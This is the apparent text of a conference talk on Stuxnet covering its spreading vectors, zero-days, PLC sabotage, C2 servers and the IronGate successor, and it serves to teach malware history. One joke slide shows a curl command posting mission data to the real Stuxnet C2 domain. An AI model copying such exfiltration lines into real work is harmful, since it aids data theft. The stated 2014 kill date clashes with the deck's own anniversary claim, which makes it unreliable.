W32.Stuxnet How a presumably military grade malware sabotaged the Iranian nuclear program Presenter: Dolev Farhi | dolev@dc416.com

acknowledgements! W32.Stuxnet Before we start spinning the Centrifuges… acknowledgements!

W32.Stuxnet [root@server ~]# whoami

W32.Stuxnet [root@server ~]# Stuxnet --help Stuxnet (W32.Stuxnet) is an advanced malware discovered in 2010 which infected dozens of manufacturing sites, but it seemed that it had a particular interest in a very specific geographical location based on the malware characteristics and later, by the numbers of affected machines reported. Stuxnet specifically attacked industrial control systems and attacked Siemens WinCC/PCS7 products running Windows. To be more specific, it attacked PLCs: controllers which allow automating processes used to control factory assembly lines and centrifuges (separation of nuclear materials)

W32.Stuxnet First identified by VirusBlokAda [root@server ~]# history | grep Stuxnet First identified by VirusBlokAda It was initially believed the earliest Stuxnet version dates back to 2009, but Stuxnet 0.5, in fact, dated back to late 2005 / early 2006. Stuxnet release to the internet was due to what was believed to be a programming error introduced in one of the ongoing software updates The first version of Stuxnet closed specific valves, causing pressure to grow 5 times higher than normal. Later versions of Stuxnet changed frequencies of the PLC’s attached motors

W32.Stuxnet

W32.Stuxnet [root@server ~]# Stuxnet --list-zero-days | wc –l 5 The final version of Stuxnet used 4 OS level zero days in total (2 RCEs and 2 local PEs) and 1 application zero day. mandatory buzz lightyear meme

W32.Stuxnet Mode of operation [root@server ~]# Stuxnet --target uranium4peace.nuclear.ir \ --dump >> /home/Obama/dailyscripts/log.txt Mode of operation if os != windows && software != siemens && … && ... &&... : sys.exit(1) else: kaboom() Stuxnet had a very strict set of requirements that had to be met in order for the payloads to be triggered Once a machine met the requirements, Stuxnet worked in two different scenes, one which attacked the Siemens PLCs and the other was initiating an MiTM inside the PLC (more on that later) Stuxnet main targets: A Windows machine 2. One or more Siemens PC7 PLCs and WinCC / STEP7 software on that machine, this piece of software is a program that provides machinery control in industrial systems. 3. not infect anything that has no value to the operation

W32.Stuxnet Siemens WinCC and Simatic S7 PLC [root@server ~]# man uranium Siemens WinCC and Simatic S7 PLC

W32.Stuxnet How it spreads [root@server ~]# Oprah.py –-generate “You get a zero day” How it spreads Stuxnet used multiple spreading vectors: Via flash drivers (infection of PLCs was not trivial as they were mostly not connected to the internet) which may indicate on the work of double agents or outside contractors Different Stuxnet versions spread in different ways, but the recent one used a Windows LNK hole and older versions used autorun.inf Stuxnet used vulnerabilities against WinCC (Siemens), Microsoft’s spooler service, Microsoft’s SMB protocol and Microsoft Windows Server RPC.

W32.Stuxnet ‘Upstream’ communication [root@server ~]# curl –data \ “location=Iran&mission=spin2death&reason=forthelulz” \ http://mypremierfutbol.com/ ‘Upstream’ communication Once Stuxnet infects a relevant machine which matches the strict criteria, it attempts to contact a server in Malaysia and Denmark via HTTP: www.mypremierfutbol.com www.todaysfutbol.com These domain names were registered in 2005 by an unknown source. Stuxnet communicated the malware spreading process to several command & control servers, which also provided the creators a way of upgrading the software and perform other tasks.

W32.Stuxnet The actual attack [root@server ~]# Stuxnet --target uranium4peace.nuclear.ir [root@server ~]# echo $? [root@server ~]# wall –n mission accomplished comrade The actual attack On top of the strict criterias systems had to meet in order for Stuxnet to infect them, it required PLCs to have frequency converter drives to be attached to them. Stuxnet looked for 2 specific vendors from Finland and Iran. It attacks systems that spin between 807hz to 1210hz, once it found them, it manipulated the operation of the motors by changing their rotational speed. it modified the frequency anywhere from 1410hz to 2hz, all while sending false data back to the operators. It had a logic condition to stop replicating itself on June 24th, 2014 … which happened to be the 7th anniversary of Mahmoud Ahmadinejad’s election as president of Iran

W32.Stuxnet [root@server ~]# env | grep “Stuxnet\|Malware\|Zero\|Hackers” It was reported on June 2nd by FireEye that a Malware similar to Stuxnet was found, targeting Siemens simulated control system environments, focused on industrial control systems. the Malware family was named IronGate. MiTMs PLC and monitoring softwares Sandbox detection and evasion Replaces DLLs and looks for specific processes Introduces false data to the operators similar to Stuxnet https://www.fireeye.com/blog/threat-research/2016/06/irongate_ics_malware.html

W32.Stuxnet Interesting read & watch list: (1) Nova: Rise of the Hackers (Documentary) (2) Countdown to Zero Day by Kim Zetter (Book) (*) Zero Days 2016 (a movie released this year)

W32.Stuxnet